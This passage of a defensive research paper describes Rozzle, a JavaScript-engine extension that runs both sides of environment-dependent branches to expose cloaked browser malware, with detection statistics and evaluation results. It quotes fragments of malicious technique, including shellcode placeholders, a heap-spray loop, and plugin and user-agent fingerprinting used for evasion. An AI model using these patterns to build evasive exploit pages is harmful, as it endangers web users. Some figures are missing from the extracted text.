processing times and network bandwidth. This fact is used by the code in this example to detect the crawler in function `jc`. If some of the images in list `jc_list` cannot be loaded, the error handler is called, which sets `ischeck` to 0. If function `jc` returns 0, an `iframe` pointing to malware is created.

### C. Code Fragility Experiment

An observation that we make on the basis of our experience with malware is that environment-dependent code is often malicious. In this section, we give the reader an understanding of the prevalence of environment sensitive JavaScript code.

Using a simple *ad hoc* static analysis tool designed to process JavaScript abstract syntax trees (ASTs), we experimentally analyze the frequency with which both benign and malicious sites get access to environment-specific data that could be used to identify the browser,

| | **All** | | **Malicious** | | **Fragility Detector** | |
|---|---|---|---|---|---|---|
| Documents | 38,930,392 | 100.00% | 2,373 | 100.00% | 194 | 100.00% |
| Reference | 2,993,848 | **7.69%** | 2,123 | **89.46%** | 194 | 100.00% |
| Branch | 466,228 | **1.20%** | 2,123 | **89.46%** | 194 | 100.00% |
| `ActiveXObject` | 440,508 | 1.13% | 2,100 | **88.50%** | 194 | **100.00%** |
| `navigator` | 151,788 | 0.39% | 1,462 | 61.61% | 147 | 75.77% |
| `navigator.plugins` | 129,326 | 0.33% | 1,444 | 60.85% | 147 | 75.77% |
| `navigator.mimeTypes` | 63,086 | 0.16% | 1,444 | 60.85% | 147 | 75.77% |
| `navigator.javaEnabled` | 55,526 | 0.14% | 1,091 | 45.98% | 119 | 61.34% |
| `navigator.userAgent` | 45,928 | 0.12% | 372 | 15.68% | 28 | 14.43% |
| `navigator.language` | 40,723 | 0.10% | 0 | 0.00% | 0 | 0.00% |
| `navigator.platform` | 27,408 | 0.07% | 0 | 0.00% | 0 | 0.00% |
| `navigator.appVersion` | 9,075 | 0.02% | 0 | 0.00% | 0 | 0.00% |
| `window` | 3,107 | 0.01% | 0 | 0.00% | 0 | 0.00% |
| `document` | 1,182 | 0.00% | 0 | 0.00% | 0 | 0.00% |
| `document.location` | 391 | 0.00% | 0 | 0.00% | 0 | 0.00% |
| `ScriptEngine` | 110 | 0.00% | 0 | 0.00% | 0 | 0.00% |

**Fig. 4:** Measuring code fragility: Environment usage statistics, across different categories of code.

a specific browser-version, installed plugins, or even the underlying operating system, or CPU architecture. We conclude that, indeed, *code fragility* is an excellent measure of maliciousness.

**Fragility detection tool:** To help with evaluating our hypothesis, we have constructed a relatively simple static analysis tool for determining what conditionals (`ifs`) in JavaScript code are environment-dependent. The tool works by statically *tainting* values [60] that are dependent on the `navigator` object and its fields and values that come from `ActiveXObject` calls. Taint is conservatively propagated through unary and binary string operations such as `trim` and string concatenation, as well as assignments.

**Experimental results:** We start with a set of 38.9 million JavaScript code snippets, representing all JavaScript presented for execution, from 2.8 million unique URLs. The set contains 2,373 JavaScript files that were flagged by Zozzle [18] and 194 files flagged by the fragility detection tool classifier mentioned above. These 194 are a strict subset of the 2,373. A summary of this data is presented in Figure 4.

The figure shows the number and fraction of files that have particular characteristics. The three main columns, "All", "Malicious" and "Fragility Detector", show the fractions of the total with respect to the different subsets mentioned above (e.g., flagged by Zozzle as malicious and flagged by our fragility detector). The "Reference" row shows those files where the `navigator` object or plugins are explicitly referenced. The "Branch" row shows those files where conditional expressions are based on the values of the `navigator` object or the presence or versions of plugins. The remaining rows break out the branches into the number of uses of specific fields of `navigator` and other environment-related variables.

We highlight our observations based on this data below:

- Only 7.7% of all JavaScript files reference environment-specific values. This fraction provides

| Avoidance technique | **Affects** | | Rozzle **improves** | |
|---|---|---|---|---|
| | Dyn. | Static | Dyn. | Static |
| Envir. testing | ✗ | ✓ | ✓ | ✓ |
| Fingerprinting | ✗ | ✗ | ✓ | ✓ |
| Cloaking (client) | ✗ | ✗ | ✓ | ✓ |
| Cloaking (server) | ✗ | ✗ | ✗ | ✗ |

**Fig. 6:** How existing malware detection techniques are affected by avoidance strategies in Section II-B and how Rozzle improves existing detection techniques.

an estimate of the fraction of files would require multi-execution to expose potential malicious behavior.

- In 1.2% of all files, there is a branch on a symbolic value. Because branches require explicit action during multi-execution, these files will incur an additional cost in Rozzle.

- We observe that 98.8% of malicious files (as flagged by the Zozzle classifier) reference the JavaScript environment, 89.5% get a reference to something we would treat as symbolic (the difference is ActiveX-XML-RPC objects, and `document` and `window` objects). The same 89.5% of malicious files will branch on these conditions.

The analysis above provides strong justification for our intuitive understanding: *exploits are environment-dependent.*

## III. Overview

Section III-A covers existing techniques and outlines their shortcomings. Section III-B describes the basics of Rozzle. Finally, Section III-C provides a detailed example of multi-execution.

### A. Challenges and Existing Techniques

While static analysis is a powerful technique that allows one to explore all program paths, a particular issue that plagues static analysis in the context of malicious

*October 25, 2011*

**Fig. 5:** Rozzle architecture as a series of trace rewriting steps.

JavaScript is that we are unable to *observe all code*. The script shown in Figure 2, for instance, selectively loads exploit content only when images are successfully loaded effectively hiding the exploit content from static analysis. Runtime evaluation has been advocated in this context [18, 27], but runtime execution suffers from the issue of low path coverage. A specific example is JavaScript malware that is triggered only when the user hovers over a particular UI element. This malware would generally not be exposed in the context of offline detection otherwise. A number of approaches to improve runtime path coverage exist, as detailed in the rest of this subsection.

**Large-scale distributed setup:** Machine clusters running different environment configurations are traditionally used for offline malware scanning, detection, and analysis. There are a number fundamental problems with this approach, however.

- **Scalability and inefficient use of resources**. While it is feasible to deploy a number of machines using different operating systems as well as browser manufacturers or versions, there are a number of other factors that need to be considered. For example, the availability of certain add-ons (such as Adobe Flash or the Java runtime) can have a great impact on how a browser renders or interacts with a remote server. Clearly, the combinatorial growth of possible plugin version/browser/browser version combinations in practice pretty much dictates the use of most popular environment configurations. In practice, this approach linearly expands the requirements on scanning hardware, network bandwidth, and power.

- **Overkill**. In order to detect malicious pages that selectively target a particular type of browser necessitates re-scanning the same page. As show in the previous section, only a very small fraction of sites found today make use of environment fingerprinting. Thus, deploying large clusters of computers re-scanning the same page and getting the same result is highly unprofitable and constitutes a waste of resources.

- **Server load**. Since multiple re-scans of the site are necessitated by this approach, load on analyzed web

servers is increased. Note that we cannot cache server responses, as they might be user agent-specific. This may lead to the server refusing to accept connections from our offline scanner.

- **Incomplete attack surface**. Any pre-defined browser setup can only handle a *known* set of browsers and plugins. Thus, there is no guarantee that this setup will detect vulnerabilities in less popular plugins that could be used in targeted attacks against a small group of victims using known browser configurations.

**Full symbolic execution:** More recently, researchers have tried applying techniques of symbolic execution [11, 12, 23] to the task of exposing malware [9, 39]. This approach, while increasing the coverage, suffers from scalability challenges and is, in many ways, unnecessarily precise. Indeed, with a very precise runtime or static detector, malicious behavior is so uncommon that the issue of feasible paths is a relatively small concern.

### B. Rozzle Architecture and Overview

Rozzle is an *enhancement* or *amplification* technology, designed to improve the efficacy of both static and runtime malware detection. Figure 6 summarizes how existing malware detection techniques are affected by avoidance strategies in Section II-B and how Rozzle improves existing detection techniques. Rozzle is effective at improving both static and runtime detection. However, Rozzle is helpless at avoiding server-side cloaking.

**Multi-execution explained:** The key idea behind Rozzle is to execute both possibilities whenever it encounters control flow branching that is dependent on the environment. For example, in the case of the `if` statement shown in Figure 7, Rozzle will execute both branches, one after another. Some readers might wonder if this creates a dependency on the order in which Rozzle will executing the `then` and the `else` branch. A key insight is that in this case we need to perform *weak updates*. In other words, the second assignment to variable `shellcode` does not override, but adds to the first value. This is like using gated SSA form [58] in optimizing compilers, except in the case of Rozzle, SSA construction happens at runtime.

```
if (navigator.userAgent=="safari") {
    shellcode = unescape("1...");
} else {
    shellcode = unescape("A...");
}
```

**Fig. 7:** Simple example of the use of symbolic values.

ROZZLE **architecture:** Figure 5 provides an overview of the ROZZLE architecture. ROZZLE augments the semantics of a regular JavaScript interpreter by introducing additional statements in the execution that correspond to multiple symbolically executed paths. The second stage concretizes output statements for symbolic values according to a concretization policy $L$.

### C. Detailed Example of Multi-Execution

To build-up the reader's intuition, we now show a more involved example of how ROZZLE handles real-life code. Figure 8 provides an illustrative example of multi-execution in action on a simplified code excerpt extracted from the fingerprinting routine in Figure 3. Figure 8(a) shows the original program. On line 10, we output the computed value `qt_plugin`. Figure 8(b) shows the *evaluation function* computed by ROZZLE to symbolically represent the computed result of `qt_plugin`. Note that the evaluation function is parameterized with the `navigator` object, whose `plugins` array is used in the function code. Conditionals in the evaluation function correspond to conditional statements in the original program. While this is outside the scope of this paper, note that evaluation functions may be analyzed entirely *statically* using one of the proposed approaches in the literature [6] to determine all potential outputs, to determine which inputs may lead to a particular output. Finally, Figure 8(c) shows the symbolic value the way it is represented by ROZZLE. Once again, the symbolic evaluation tree directly matches the structure of the evaluation function in Figure 8(b), with leaves contributing the potential values of the output, which are either the result of evaluating

```
parseInt(name.replace(/\D/g,"")).toString(16)
```

or `"0"`.

## IV. TECHNIQUES

This section focuses on the details of multi-execution, covering both the fundamental principles and the details of ROZZLE implementation on top of the Chakra JavaScript engine in IE 9. Because of the amount of technical detail, it might be skipped on first reading and returned to afterwards. This section is organized as follows. Section IV-A describes how we construct and manipulate symbolic values. Section IV-B elaborates challenges faced with a naïve implementation of multi-execution. Section IV-D discusses "concretizing" symbolic values on-demand. Section IV-E discusses the details of multi-execution in ROZZLE. Finally, Section IV-F talks about our implementation of ROZZLE built on top of IE 9.

```
1  var qt_plugin = "0";
2  var name = navigator.plugins[0].name;
3  if (qt_plugin == 0 && name.indexOf("QuickTime") != -1) {
4      var helper = parseInt(name.replace(/\D/g,""));
5      if (helper > 0){
6          qt_plugin = helper.toString(16)
7      }
8  }
9  output(qt_plugin);
```
(a) Original program.

```
function(navigator) {
    var name = navigator.plugins[0].name;
    return ("0" == 0 && name.indexOf("QuickTime") != -1) ?
        parseInt(name.replace(/\D/g,"")) ?
            parseInt(name.replace(/\D/g,"")).toString(16) :
            "0" :
        "0";
}
```
(b) Evaluation function.



(c) Symbolic value for output represented as a parse tree in the grammar shown in Figure 9. Concrete values (leaf nodes) are shown in black. The triangle represents a subtree rooted at a `parseInt` node, identical to the subtree to the left of the triangle.

**Fig. 8:** Example of multi-execution.

### A. Symbolic Values

At the core of the ROZZLE approach is the idea to treat some *heap values* as *symbolic*. This is a departure from traditional symbolic execution approaches: for example, in Sage [23], numerous program traces are considered, one after another, which correspond to different program paths. In ROZZLE, similar exploration is achieved through executing multiple branches in the course of a *single* modified execution, using symbolic heap values to reflect multiple program outcomes. For example, the merge of two versions of `shellcode` in Figure 7 gives rise to a

Expressions

$symExpr$ ::= $numExpr \mid stringExpr \mid boolExpr$
$\mid memberCall \mid funcCall \mid \star$
$\mid condExpr \mid$ **concretize**$(symExpr)$

$condExpr$ ::= $boolCond ? symExpr : symExpr$
$binaryExpr$ ::= $symExpr \, binaryOp \, symExpr$

$funcCall$ ::= $func \, (\, paramExpr \,)$
$memberCall$ ::= $symExpr \, . \, func \, (\, paramExpr \,)$
$paramExpr$ ::= $symExpr \mid symExpr \, , \, paramExpr$

Booleans

$boolCond$ ::= $boolExpr \mid \neg boolExpr$
$\mid symExpr \lor symExpr$
$\mid symExpr \land symExpr$

$boolExpr$ ::= **true** $\mid$ **false**
$\mid symExpr \, boolOp \, symExpr$
$\mid$ **isSymbolic**$(symExpr)$

Numerics

$numExpr$ ::= $numericFunc(symExpr) \mid \mathtt{1} \mid \mathtt{2} \mid \ldots$
$\mid numExpr \, binaryOp \, numExpr$
$\mid -numExpr$
$\mid$ **parseInt**$(stringExpr)$
$\mid$ **indexOf**$(stringExpr, stringExpr)$
$\mid$ **abs**$(numExpr)$
$\mid$ **min**$(numExpr, numExpr)$
$\mid \ldots$

String expressions

$stringExpr$ ::= $stringFunc(symExpr) \mid$ **""** $\mid \ldots$
$\mid$ **encodeURI**$(stringExpr)$
$\mid$ **decodeURI**$(stringExpr)$
$\mid$ **substr**$(stringExpr)$
$\mid$ **concat**$(stringExpr, stringExpr)$
$\mid$ **replace**$(stringExpr, stringExpr)$
$\mid$ **replace**$(/stringExpr/, stringExpr)$
$\mid$ **toString**$(numExpr)$
$\mid$ **toString**$(numExpr, numExpr)$
$\mid \ldots$

Operators

$binaryOp$ ::= $+ \mid - \mid * \mid / \mid \% \mid << \mid >>$
$boolOp$ ::= $= \mid \neq \mid < \mid <= \mid > \mid >=$

**Fig. 9:** BNF for symbolic expressions used in ROZZLE. The start symbol is $symExpr$.

symbolic value that is created a runtime *after* the `if/else` construct:

```
shellcode₃ = navigator.userAgent=="safari" ?
shellcode₁,shellcode₂)
```

Note the merge the weak updates in the conditional because of the dependency on the `userAgent` string. In general, objects that provide environment-specific data come in a variety of different basic as well as complex object types, such as *strings* (e.g., `userAgent`), *integers* (`ScriptEngineVersion`), and *objects* (supported mimetypes) or `ActiveXObjects`. We should point out that dynamically-typed languages are especially well-suited to having symbolic heap values, so the approach we outline here is equally appropriate for JavaScript, Python, Ruby, or Perl. When representing symbolic values at runtime, within the JavaScript heap, we introduce a new JavaScript object type, `symbolicWrapper` that contains information

that it is wrapping (e.g. a `userAgent` string) as well as the current concrete type. Initially, each symbolic wrapper has the runtime type of the wrapped object (e.g. *string* when wrapping a `navigator.userAgent` string value).

**Marking values as symbolic:** All environment-specific values start out as symbolic in ROZZLE. For example, `navigator.userAgent` is treated symbolically, whereas the string "0" is not. This is quite similar to the notion of runtime tainting [60]. In ROZZLE, taint originates with the fields of the `navigator` object. Additionally, we mark as symbolic the results of functions `ActiveXObject`, `ScriptEngine`, `ScriptEngineMajorVersion`, `ScriptEngineMinorVersion`, and `ScriptEngineBuildVersion` in the engine.

### B. Challenges

While the basic idea of maintaining symbolic values on the heap is straightforward, any implementation must address some fundamental challenges, including the following:

- **Looping on a symbolic value:** When looping on a symbolic value, how many iterations do we need to perform?
- **Writing symbolic values to the DOM:** Symbolic values represent multiple concrete ones, so which of the concrete values do we write out to the DOM?
- **Output operations on symbolic values:** What if a symbolic value is used to compute the URL that the program is reading data from? How do we make these network requests concrete? Do we consider all of them?
- **Limiting the size of symbolic values within the heap:** When representing the symbolic heap naïvely, there is a very real possibility of running out of memory, because of the extra context provided by the symbolic values.
- **Introducing errors:** ROZZLE may introduce new errors in correct code. One key reason is that ROZZLE may expose differences in browser implementations, executing paths that would otherwise be infeasible. Other reasons exist as well, including running out of time, memory, or resources, making too many outside connections and being blocked by third-party servers, throwing exceptions, etc. We discuss errors that ROZZLE may introduce in Section VII-A.

### C. Symbolic Values: Manipulation and Representation

Figure 9 summarizes a grammar that captures symbolic values that may be created by ROZZLE at runtime. We provide this in the form of a BNF grammar where $symExpr$ is the start symbol; symbolic value trees that are created at runtime can be seen as parse trees for expressions in this grammar. Grammar elements such as $condExpr$, $numericExpr$, or $stringExpr$ give rise to intermediate tree nodes, as shown in Figure 8(c). Elements $memberCall$ and $funcCall$ are slightly more complicated. Whenever there is

a call to a property of the object (i.e., a member function), we need to check if the current concrete type supports this method. If so, the output is a symbolic object representing the result of calling the function on the given object. This produces an AST of symbolic objects where each node in the tree contains a function and sub-ASTs for each call parameter.

**Depth limiting:** When creating new symbolic values, we are careful to limit the depth of resulting symbolic trees. One of the common reasons this comes up is because of symbolic values updated in a non-symbolic loop, which leads to the creation of unbounded nested trees. Our solution is to collapse the entire tree the moment its depth exceeds a fixed threshold and represent is as a special symbolic value $\star$.

**Symbolic value compression:** A challenge that we have to address when dealing with large JavaScript programs that have a lot of tainted branches is to keep the size of symbolic value trees small. Our approach to reducing the memory footprint of ROZZLE involves using a *canonical representation* for data structures used to represent symbolic values, in a manner similar to decision diagrams [10], etc. This way, symbolic values will share some of the subtrees, as illustrated with the triangle in Figure 8. In ROZZLE, we keep a pool of allocated symbolic values and, whenever creating a new conditional value, consult the list to see if the sub-components of the conditional are already found in the pool. Comparisons against existing pool elements are very fast and are currently done via a depth-first explicit comparison; an alternative involves using hashing and a lookup table for the same purpose.

### D. Resolution of Symbolic Values

While the use of symbolic values in ROZZLE allows us to explore more code paths than can be observed through a single concrete execution based on one particular environment, there exist cases where we need to obtain concrete values in the JavaScript engine from symbolic values constructed by ROZZLE. Typically this happens, when an object is passed from the JavaScript engine to another browser subsystem (e.g., during modifications of the DOM, when browsing to a new URL, requesting new content from the web, etc.). Figure 8(c) shows a graphical representation of a variable in symbolic memory. When ROZZLE requires concrete values (e.g., when passing a symbolic variable outside the JavaScript engine), it traverses the tree in memory and generates code as seen in Figure 8. Our system uses predefined profiles: ROZZLE generates code that iterates over the given sets, using the generated formula to resolve concrete values. These values, together with a label that identifies the underlying profile, are stored as concrete value candidates.

**Handling the DOM and IO:** Concretization is required when dealing with various IO subsystems within the browser. Most common examples include writing symbolic

Statements
$$stmt \ ::= \ var = symExpr \mid var.field = symExpr$$
$$\mid \textbf{if} \ (symExpr) \ \textbf{then} \ stmt \ \textbf{else} \ stmt$$
$$\mid \textbf{while} \ (symExpr) \ stmt$$
$$\mid symExpr = symExpr(symExpr, \dots, symExpr)$$
$$\mid \textbf{output} \ (symExpr)$$

**Fig. 10:** Statements in our program representation.

values to the DOM and using symbolic values as parameters of a network request. Currently, we take the simple approach of just extracting the first of potentially many concrete values out of a symbolic one. This, of course, is an implementation choice. When dealing with the DOM, it is possible to *cache* symbolic values before they cross the JavaScript engine/DOM divide and then, whenever a value is returned back from the DOM, check it against the cache to return the symbolic version back to the JavaScript engine if necessary; this is the approach previously used in the CONSCRIPT project [34]. In the case of network requests being symbolic, we limit the requests to the first concrete value as well. An alternative would be to create multiple (cloned) browser instances or tabs that would continue executing in parallel.

**Local focus:** Weak updates can lead to an unnecessary loss of precision. To understand why, consider the following loop:

```
if(navigator.userAgent.indexOf("safari") > 0){
    for(i=0; i<5000; i++){
        // ignore the undef because path
        // predicate matches the symbolic value predicate
        // i = is_safari ? 0 : undef;
        memory[i] = nop + nop + shellcode;
    }
}
```

naïvely, ROZZLE would treat assignments to variable `i` symbolically, because the loop increment is considered to be an assignment that is control dependent on the outcome of the `if`. However, for the special case of the path predicate matching the predicate of the conditional symbolic value, the other alternative, `undef`, is projected away, and ROZZLE in this case will treat loop variable `i` non-symbolically. This change to the default strategy is actually quite important because treating this loop symbolically means that we are *not* executing the loop 5,000 times and are therefore not going to be flagged at runtime by ROZZLE for attempting a heap spray attack. This form of special-casing is akin to the notion of focus used to obtain locally precise treatment in static analysis [21].

### E. Details of Multi-Execution

Figure 11 shows pseudo code for our multi-execution engine. The inputs of the algorithms are program $P$, which is a collection of statements $stmt_1, \dots, stmt_n$, browser profile $\pi$, an output policy $L$, and a side-effect hash map $mod$.

The profile contains specific details of the environment such as the `userAgent` string, the `plugins` array and the data accessible from it, the major and minor version of the JavaScript engine, etc. The output policy decides how to concretize a symbolic value at an output statement by potentially expanding it into multiple trace statements.

The output policy $L$ defines how to concretize a particular value $e$ at output statement $i$ given profile $\pi$, and the $mod$ hash map. Many policies exist, including concretizing $e$ with respect to $\pi$, sequentially outputting all concrete values in $e$, etc.

Function *isSymbolic* is a runtime check that returns whether the value passed in should be treated symbolically. The algorithm in Figure 11 consists of an interpreter loop that handles the cases of an if conditional, a loop, etc. in turn.

**Branching on symbolic values:** In cases where the code branches on a symbolic value, we need to make a decision which branch to take. In traditional symbolic execution, the framework will consider both outcomes, one at a time, and check if either is feasible using a theorem prover to validate the path condition. In ROZZLE, we execute *both* cases. We do this, by maintaining a symbolic stack of conditions that must be fulfilled to reach the current point in the execution. Considering Figure 12, the `if/else` block would have an active symbolic value of `fingerprint.indexOf(IE) >= 0` and any variable assignment within this block will need to respect this condition. Thus, when we assigning to either a variable or a heap object of the form $object.field$ outside this block, it will be made into a conditional symbolic value. Before executing the `else` branch, the active element on the symbolic-condition stack is inverted. Assignments to variables are merged when one sees that it is a reference to a variable that is already conditional on a symbolic. This means, after executing the above block, variable `isIE` would hold

```
isIE = (x.indexOf("IE") >= 0) ? true : false;
```

Note that this form of multi-execution when both branches are followed is only performed with the conditional is symbolic, which in practice happens quite rarely for benign programs, so we are not going to see a significant increase in the running time. As mentioned before, in ROZZLE, we execute branches that are dependent on symbolic variables sequentially, one after another. To support weak updates on such code paths, we proceed as follows: Whenever a branch is encountered and ROZZLE finds that the condition is symbolic, the condition is pushed onto a stack used to keep track of path predicates. When executing the `else`-statement of a symbolic branch, the condition on the top of stack is inverted and used as condition for the new branch. The `else` block is handled by combining the element on stack with the new condition. When leaving the symbolic branch (i.e., after executing the last branch conditioned under the symbolic predicate), the symbolic condition is popped from the stack. Within a symbolic branch, weak

$MultiExecute(P = \{stmt_1, \ldots stmt_n\}, \pi, L, \Gamma = \texttt{default(globalObject)})$

```
 1: for i=1 . . . n do
 2:    switch stmt_i :
 3:      case if (e) then T_t else T_f
 4:        if isSymbolic(e) then
 5:          Γ_t = []
 6:          Γ_t.prototype = Γ
 7:          MultiExecute(T_t, π, L, mod_t)
 8:          Γ_f = []
 9:          Γ_f.prototype = Γ
10:          MultiExecute(T_f, π, L, mod_f)
11:          Γ = Range(Γ_t) ∩ Range(Γ_f)
12:          for all v in Γ do
13:            Γ[v_t] = Γ_t[v]
14:            Γ[v_f] = Γ_f[v]
15:            Γ[v] = φ(e, v_t, v_f)
16:          end for
17:          for all v in (Range(mod_t) \ Γ) do
18:            Γ[v] = φ(e, v, v_t)
19:          end for
20:          for all v in (Range(mod_f) \ Γ) do
21:            v = φ(¬e, v, v_f)
22:          end for
23:        else
24:          if e then
25:            T_t
26:          else
27:            T_f
28:          end if
29:        end if
30:      end case
31:      case while(e) do T
32:        l_head :
33:        if isSymbolic(e) then
34:          Γ' = []
35:          Γ'.prototype = env
36:          MultiExecute(T, π, L, Γ')
37:          for all v in Range(Γ') do
38:            Γ[v] = φ(e, Γ'[v], Γ[v])
39:          end for
40:          goto l_end
41:        else
42:          if e then
43:            T
44:            goto l_head
45:          else
46:            goto l_end
47:          end if
48:        end if
49:        l_end :
50:      end case
51:      case v = e
52:        Γ[v] = e
53:      end case
54:      case v_1 = v_2
55:        Γ[v_1] = Γ[v_2]
56:      end case
57:      case output(e)
58:        L(e, i, π, Γ)()
59:      end case
60:    end switch
61: end for
```

**Fig. 11:** Algorithm for multi-execution which takes program $P$, profile $\pi$, and output policy $L$ as inputs. The last parameter $\Gamma$ is an optional in-out hash map that represents the side effects of calling *MultiExecute*; the default value for $\Gamma$ is `globalObject` that is typically the same as the `window` object in JavaScript.

updates are used for both variable assignments and heap object stores. For this, the current path condition (i.e., the conjunction of all elements of the path predicate stack) is used to build the tree of symbolic memory as described above. The pseudo code for handling conditionals is shown in lines 3–28 of Figure 11.

**Looping on symbolic values:** Handling symbolic loops

```
var x = fingerprint;
var isIE;
if (x.indexOf("IE") >= 0) {
    isIE = true;
} else {
    isIE = false;
}
```

**Fig. 12:** Symbolic execution: a simple `if`.

```
var hasPDF;
try {
    new ActiveXObject("pdf");
    hasPDF = true;
} catch (exc) {
    hasPDF = false;
}
```

**Fig. 13:** Symbolic execution: `try`/`catch`.

presents probably the most complex case for ROZZLE to address. To simplify our discussion, we assume that we are dealing with a `while`-loop with a conditional $e$ and body $B$. The pseudo code for handling loops is shown in lines 29–47 of Figure 11. The intuitive idea is to rewrite the trace corresponding to the loop into an augmented trace which, at every loop iteration checks to see if the loop conditional $e$ is symbolic. Note that $e$ may *become* symbolic after several iterations. It that happens, we will proceed to treat loop updates as weak updates using mask *mod* and to terminate the execution of the loop after one (symbolic) iteration. If the conditional $e$ is not symbolic, we will proceed to execute as usual, until either the loop terminates (line 37) or the loop conditional becomes symbolic.

### F. Prototype Implementation in Chakra

Our implementation of ROZZLE is based on Chakra, the Internet Explorer 9 JavaScript execution engine. Chakra supports a wide range of non-standardized JavaScript methods and objects. This is important because using IE, we can more successfully pretend to be a different browser and have extra methods available to call than in other settings, leading to fewer errors introduced by ROZZLE. Another reason for choosing Chakra is its performance [35]. When ROZZLE needs to resolve symbolic variables into concrete values, we use the JavaScript engine: symbolic memory is a specific representation transformation step operated on environment-dependent variables. Thus, it can be directly translated into code that, given a set of environments, produce possible concrete values, as illustrated in Figure 8. Below, we describe the necessary modifications to support multi-execution in the Chakra framework:

**Symbolic memory:** To represent symbolic variables inside the framework, we introduce a new JavaScript runtime type *symbolicWrapper*. Variables of this type support all operators typically supported by other runtime types in the language (e.g., assignments, additions, etc.), however, they cannot be instantiated by user-provided code directly. Any attempts of allocating such an instance results in a runtime exception. All functions that return values that can be used to fingerprint the runtime environment (i.e., the browser version) are modified to return symbolic variables. Likewise, global or DOM objects (e.g., `navigator.userAgent`) produce symbolic values. Similar to other languages that support dynamic types, JavaScript

allows us to check the type of a variable at runtime. In our scenario, this allows an attacker aware of ROZZLE to detect and avoid execution inside our system. Although such code would be very indicative of malicious behavior if detected, we tackle this problem as follows: if the type of a variable of type symbolic is queried or compared to another type using the `typeof` keyword, ROZZLE resolves the type that most closely resembles the given variable (e.g., for a symbolic variable holding the `navigator.userAgent`, the system returns a `string`).

**Function calls:** Symbolic value may be passed into both the JavaScript language and the DOM API functions exposed by the JavaScript engine. An example of this is are `concat` and `indexOf` functions on strings. We need to augment natively implemented function in Chakra to first check if any of the parameters is symbolic and to return a properly constructed new symbolic value if that is the case. While this might sound like a considerable amount of manual work, fortunately, as most parts of the API are written natively in C, we only need to insert a single macro into the prologue of each function.

**Virtual branching and `try`/`catch` blocks:** Exceptions provide a common way for the attacker to test the capabilities of the environment in which their code executes. As such, we need special handling of a particular way of testing the availability of certain features in JavaScript that happens often in malicious code. Consider the following commonly found example shown in Figure 13. We handle this by introducing "virtual `if`-blocks" after the allocation of symbolic values. We do this by pushing a special condition onto the condition stack after the allocation of an object that might not exist, treating the `try` block as the virtual `then` and the catch block as the virtual `else`. After the `if`-block, we execute the `catch` block and inverting the active condition (just like in the `else` block case). This would lead to a symbolic expression such as

```
hasPDF = (has_activeX_support_pdf) ? true : false;
```

where `has_activeX_support_pdf` is a special variable that parameterizes the environment.

### V. EVALUATION

In this section, we evaluate the usefulness of ROZZLE. We compare two configurations: base, which is a standard browser without multi-path execution, and ROZZLE, where multi-path execution is enabled. We compare these configurations in our experiments: in Section V-A, we analyze

*October 25, 2011*



**Fig. 14:** Offline malicious-only detection: ROZZLE improvements.

the impact of our multi-path execution on our runtime detector using a set of known malicious JavaScript files. In Section V-B, to understand the degree in which the system exposes new web-based malware on the Internet, we extend an existing high-interaction client honeypot with ROZZLE and analyze live URLs. Finally, in Section V-C, we measure ROZZLE's impact on the high-interaction client honeypot in terms of memory as well as runtime overhead.

### A. Improved Offline Detection Rates with ROZZLE

To understand if ROZZLE is able to extract new runtime behavior in real malicious scripts, we selected a set of 65,855 web-based malware samples found in the wild using the ZOZZLE static malware detector in combination with a high-interaction client honeypot on a large cluster of machines.

**Setup:** In this experiment, we take special care to minimize the degree to which external influences could affect the outcome, such as site availability or modifications of the exploits. For this, we extracted the JavaScript context flagged by ZOZZLE and hosted the file on a server on our network, thus the name *offline* experiments. For this experiment we placed the files on a local disk and we visited each file as a local URL using the high-interaction client honeypot twice, once using it's default configuration using an Internet Explorer 9 profile (*base* run) and a second time using the ROZZLE-extended version. As the client honeypot renders and executes the page content, it scans any JavaScript contexts found using ZOZZLE and also uses NOZZLE to detect any suspicious behavior during the execution of the scripts.

**Results:** Figure 14 shows the detection rates using our dynamic detector, NOZZLE, during the visits of our high-interaction client honeypot. We do not include static detection by ZOZZLE, as all scripts have previously been detected by the latter. The figure shows an overview of the detection results: NOZZLE triggered in 1,662 cases total in the base run while the second run using ROZZLE flagged 11,559 URLs (595.5% more detections). In 1178 cases (70.9%) the URL was flagged in both runs, leaving 484 URLs (29.1%) where ROZZLE introduced an error into the script's execution before it was flagged. These results provide valuable information to improve our prototype implementation in the future and we discuss possible

reasons for these errors in Section VII-A. In contrast to the 484 errors introduced, we see that ROZZLE is able to expose new malicious dynamic activity in 10,381 cases. This clearly demonstrates two things: first, ROZZLE is successful in increasing path coverage using multi-path execution. Second, environment-sensitive malware is a real problem and ROZZLE is able to expose it.

### B. Improved Online Detection Rates with ROZZLE

In a second experiment, we collect and visit a set of URLs hosted on the Internet. This allows us to test if ROZZLE is able to extract previously unseen content that might be detected using either of our detectors. Early on in the evaluation, we found that this is not an easy task as malware hosting servers are quite unreliable. As described in [69], we encountered a large number of malicious URLs where attacks were served only once to a given IP address/ subnet or only once within a given time frame (e.g., using a cookie-check). This creates the problem that depending on which configuration is used first(base versus ROZZLE), that configuration may see more malware simply because the site fails to serve the malware a second time. To make our estimates of ROZZLE's effectiveness conservative, we visit each URL with the base configuration first. Thus, if the exploit is not served during the second run (using ROZZLE), we might mistake this as an error introduced by ROZZLE, but not as a new detection. Further, we manually verified a large fraction of the analysis results where we see a difference in the two runs, excluding those that are caused by a clear difference in the content served by the server.

**Setup:** For this experiment, we obtained a large set of suspicious URLs from static analysis of web crawler content. Because our experimental resources were limited, we applied blacklist-based filtering to increase the likelihood of visiting URLs hosting malware: Each URL was checked against a list of hosts known to serve malicious content as well as using Google's SafeBrowsing API. For 57,132 URLs (approximately 0.1% of the initial list), at least one of the checks succeeded and we visited the URL with our two experimental configurations. In this experiment, we wanted to determine the effect of ROZZLE on both static and dynamic malware detectors, so we enabled both ZOZZLE and NOZZLE detection in our browsers for both configurations.

**Results:** NOZZLE and ZOZZLE improvement rates for these experiments are summarized in Figure 15(a). Our dynamic detector, NOZZLE, flagged 74 malicious URLs with the base configuration and 224 using the ROZZLE configuration. Similar to the results obtained during the offline evaluation, 24 (32.4%) of the base detections were not detected with the ROZZLE configuration, but ROZZLE enabled many more (174) new NOZZLE detections. For the static detector, ZOZZLE, the results are somewhat different. In the base configuration, 2,735 URLs were flagged as malicious while using ROZZLE only detected 2,660 malicious URLs. A total of 2,510 URLs were detected in both runs, with errors



(a) NOZZLE improvement rates. (b) ZOZZLE improvement rates

**Fig. 15:** Online general URL detection: improvement rates



**Fig. 16:** Online general URL detection: new detections with ROZZLE.

